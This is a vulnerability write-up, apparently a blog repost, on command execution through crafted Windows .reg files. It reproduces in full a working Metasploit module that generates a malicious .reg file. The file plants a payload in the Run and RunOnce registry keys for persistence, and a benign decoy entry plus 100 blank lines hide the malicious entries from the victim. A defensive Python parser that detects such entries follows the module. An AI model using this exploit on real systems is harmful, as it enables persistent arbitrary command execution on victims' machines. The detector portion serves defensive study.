Windows Registration Entries (reg) File Vulnerability

Vulnerability Information

Vulnerability name: Windows Registration Entries (.reg) File Vulnerability

Vulnerability type: Command execution

Severity: High

Vulnerability description: This issue abuses Windows Registration Entries (.reg) files. Importing a crafted file adds a specific malicious payload to the Windows registry, achieving command execution: the payload runs automatically when the user logs in to Windows. If the user has elevated privileges when opening the file, the payload runs whenever any user logs in. When opening the file, the user receives a warning prompt asking them to confirm the registry changes.

Affected products: Windows operating systems, specifically Microsoft Windows 2000 and newer. Windows is used worldwide and is deployed on personal computers, enterprise servers and many other environments.

Vulnerability explanation: This is a command-execution issue. Its technical root cause is that the safeguards Windows applies when importing .reg files are insufficient, so a malicious payload can be registered in the registry for automatic execution. An attacker can craft a .reg file and induce a user to open it, after which the malicious command runs automatically each time the user logs in.

Impact analysis: This vulnerability may lead to remote code execution; an attacker can use it to run arbitrary commands on the victim's machine, with serious consequences such as data leakage or service disruption. Exploitation requires user interaction (opening the malicious .reg file), but once the file is imported the attacker can control the affected system. Because Windows is so widely used, the scope of impact is large, especially for users unfamiliar with the security risk.

Vendor: Microsoft

Product: Windows

Affected versions: Microsoft Windows 2000 or newer

Source: https://github.com/rapid7/metasploit-framework/blob/c5ec45452aec6abfd289c3de26d628ed3374712c/modules%2Fexploits%2Fwindows%2Ffileformat%2Fwindows_registration_entries.rb

Type: rapid7/metasploit-framework:github issues

PoC details


```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Malicious Windows Registration Entries (.reg) File',
        'Description' => %q{
          This module creates a Windows Registration Entries (.reg) file which
          adds the specified payload to the Windows Registry. The payload runs
          upon Windows login for the current user. If the user has elevated
          privileges when opening the file, the payload will run upon login
          when any user logs in.

          The user will receive a warning prompt to confirm Registry changes
          when opening the file.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'bcoles'
        ],
        'References' => [
          ['URL', 'https://support.microsoft.com/en-us/topic/how-to-add-modify-or-delete-registry-subkeys-and-values-by-using-a-reg-file-9c7f37cf-a5e9-e1cd-c4fa-2a26218a1a23'],
          ['URL', 'https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys'],
          ['URL', 'https://learn.microsoft.com/en-us/windows-hardware/drivers/install/runonce-registry-key'],
          ['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE],
          ['ATT&CK', Mitre::Attack::Technique::T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER],
        ],
        'Arch' => [ARCH_CMD],
        'Platform' => 'win',
        'Payload' => {
          'Space' => 244, # 255 minus "cmd.exe /c " prefix length
          'BadChars' => "\x00",
          'DisableNops' => true
        },
        'Targets' => [
          [
            'Microsoft Windows 2000 or newer',
            {
              'RegistryEditorVersion' => '5.00'
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '1995-08-24',
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'DisablePayloadHandler' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
          'SideEffects' => [SCREEN_EFFECTS]
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [true, 'The registration entries file name.', 'msf.reg']),
      ]
    )

    register_advanced_options([
      OptBool.new('AddToCurrentUserWindowsCurrentVersionRun', [false, 'Add payload to login for current user.', true]),
      OptBool.new('AddToCurrentUserWindowsCurrentVersionRunOnce', [false, 'Same as AddToCurrentUserWindowsCurrentVersionRun, but the registry key is deleted after use.', false]),
      OptBool.new('AddToLocalMachineWindowsCurrentVersionRun', [false, 'Add payload to login for all users. The user will see a vague error message if they do not have the necessary permissions, but all other entries are still added successfully.', true]),
      OptBool.new('AddToLocalMachineWindowsCurrentVersionRunOnce', [false, 'Same as AddToLocalMachineWindowsCurrentVersionRun, but the registry key is deleted after use.', false]),
      OptBool.new('PrependBenignEntry', [false, 'Prepend a benign registry entry at the start of the file.', true]),
      OptInt.new('PrependNewLines', [false, 'Prepend new lines before the first malicious registry entry.', 100]),
    ])
  end

  # Create a registry entry in Windows .reg file format
  def registry_entry(path, type, key, value)
    # https://learn.microsoft.com/en-us/windows/win32/sysinfo/registry-element-size-limits
    raise "Registry key '#{key}' length (#{key.length}) is too long (max 255)" if key.length > 255
    raise "Registry value '#{value}' length (#{value.length}) is too long (max 16,300)" if value.length > 16_300

    # https://learn.microsoft.com/en-us/windows/win32/sysinfo/registry-value-types
    raise "Unsupported key type '#{type}', expected REG_SZ" unless type == 'REG_SZ'

    # .reg string values escape backslashes as \\ and double quotes as \"
    escaped_value = value.gsub('\\', '\\\\\\').gsub('"', '\\\"')
    reg_entry = "[#{path}]\r\n"
    reg_entry << "\"#{key}\"=\"#{escaped_value}\"\r\n"
    vprint_status("Created registry entry:\n#{reg_entry}")
    reg_entry
  end

  # Format commands for use with the appropriate interpreter
  def format_commands(command_string)
    # Strip preceding whitespace as this would prevent execution
    raw_cmd = command_string.to_s.gsub(/^\s*/, '')

    # If the payload contains " & " we presume it is a command string.
    #
    # TODO: Change this once Metasploit is able to inform a module that
    # the specified ARCH_CMD payload is a string of commands
    # (not a single command).
    if raw_cmd.include?(' & ')
      cmd = "cmd.exe /c #{raw_cmd}"
    else
      cmd = raw_cmd
    end

    raise "Command length (#{cmd.length}) is too long (max 255)" if cmd.length > 255

    cmd
  end

  def exploit
    # File structure:
    #   File header string
    #   Benign registry entry (optional)
    #   Visual whitespace padding (optional)
    #   HKCU entries
    #   HKLM entries (optional)
    reg = "Windows Registry Editor Version #{target['RegistryEditorVersion']}\r\n"
    reg << "\r\n"

    reg_entries = []

    if datastore['PrependBenignEntry']
      path = "HKEY_CURRENT_USER\\Software\\#{rand_text_alphanumeric(10..16)}"
      key = rand_text_alphanumeric(10..16)
      reg << registry_entry(
        path,
        'REG_SZ',
        key,
        rand_text_alphanumeric(10..16)
      )
      reg_entries << path + '\\' + key
    end

    reg << "\r\n" * datastore['PrependNewLines']

    if datastore['AddToCurrentUserWindowsCurrentVersionRun']
      path = 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run'
      key = rand_text_alphanumeric(10..16)
      reg << registry_entry(
        path,
        'REG_SZ',
        key,
        format_commands(payload.encoded)
      )
      reg_entries << path + '\\' + key
    end

    if datastore['AddToCurrentUserWindowsCurrentVersionRunOnce']
      path = 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce'
      key = rand_text_alphanumeric(10..16)
      reg << registry_entry(
        path,
        'REG_SZ',
        key,
        format_commands(payload.encoded)
      )
      reg_entries << path + '\\' + key
    end

    if datastore['AddToLocalMachineWindowsCurrentVersionRun']
      path = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
      key = rand_text_alphanumeric(10..16)
      reg << registry_entry(
        path,
        'REG_SZ',
        key,
        format_commands(payload.encoded)
      )
      reg_entries << path + '\\' + key
    end

    if datastore['AddToLocalMachineWindowsCurrentVersionRunOnce']
      path = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
      key = rand_text_alphanumeric(10..16)
      reg << registry_entry(
        path,
        'REG_SZ',
        key,
        format_commands(payload.encoded)
      )
      reg_entries << path + '\\' + key
    end

    # An empty Array is truthy in Ruby, so test emptiness explicitly
    if reg_entries.empty?
      fail_with(Failure::BadConfig, 'No registry entries were created! Check module advanced options.')
    end

    file_create(reg)

    print_status("This file will create the following registry keys:\n#{reg_entries.join("\n")}")
  rescue StandardError => e
    print_error(e.message)
  end
end
```
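As an added example from the defender's side (not part of the module or this page), a small parser that reads a .reg file, undoes the `\\` and `\"` escaping the module's registry_entry applies, skips the benign first entry and the blank-line padding that the PrependBenignEntry and PrependNewLines options insert, and reports any string value written under an HKCU or HKLM Run/RunOnce key. The sample file is constructed here to mirror the module's file layout.

```python
import re

# Autostart locations the module writes to (HKCU and HKLM), compared case-insensitively
AUTORUN_KEYS = re.compile(
    r"^HKEY_(CURRENT_USER|LOCAL_MACHINE)\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?$",
    re.IGNORECASE,
)
# A "name"="data" string value line, allowing escaped quotes and backslashes inside
VALUE_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')

def unescape(s):
    """Undo .reg string escaping: \\\\ becomes \\ and \\" becomes " (inverse of the module's gsub)."""
    return re.sub(r'\\(["\\])', r'\1', s)

def parse_reg(text):
    """Parse a Registry Editor 5.00 file into (key_path, value_name, value_data) tuples."""
    lines = text.replace("\r\n", "\n").split("\n")
    if not lines or not lines[0].startswith("Windows Registry Editor Version"):
        raise ValueError("not a Windows Registry Editor 5.00 file")
    entries, current = [], None
    for line in lines[1:]:
        line = line.strip()
        if not line:  # blank padding lines (the module can prepend 100 of them)
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]  # start of a new key section
            continue
        m = VALUE_LINE.match(line)
        if m and current is not None:
            entries.append((current, unescape(m.group(1)), unescape(m.group(2))))
    return entries

def find_autoruns(text):
    """Return entries that add a command under a Run/RunOnce key, whatever precedes them."""
    return [e for e in parse_reg(text) if AUTORUN_KEYS.match(e[0])]

# Constructed sample mirroring the module's layout: benign entry, blank padding, then a Run value
SAMPLE = (
    "Windows Registry Editor Version 5.00\r\n\r\n"
    "[HKEY_CURRENT_USER\\Software\\Abc123]\r\n\"Xyz\"=\"harmless\"\r\n"
    + "\r\n" * 100 +
    "[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]\r\n"
    "\"Qwerty\"=\"cmd.exe /c echo \\\"hi\\\" & C:\\\\Temp\\\\app.exe\"\r\n"
)

if __name__ == "__main__":
    for key, name, data in find_autoruns(SAMPLE):
        print(f"AUTORUN {key}\\{name} -> {data}")
```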

http://example.com/2025/07/15/github_1865017343/
Author: lianccc
Published: July 15, 2025